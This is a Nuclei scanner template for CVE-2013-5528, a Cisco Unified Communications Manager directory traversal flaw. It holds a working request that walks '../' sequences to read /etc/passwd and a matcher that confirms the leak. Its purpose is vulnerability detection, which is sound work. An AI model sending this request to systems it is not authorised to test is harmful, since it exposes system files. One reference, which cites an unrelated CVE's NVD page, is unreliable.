nuclei-templates/http/cves/2013/CVE-2013-5528.yaml

37 lines
1.2 KiB
YAML

id: CVE-2013-5528
info:
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
reference:
- https://www.exploit-db.com/exploits/40887
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
- http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
cvss-score: 4
cve-id: CVE-2013-5528
cwe-id: CWE-22
tags: cve,cve2013,lfi,cisco,edb
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200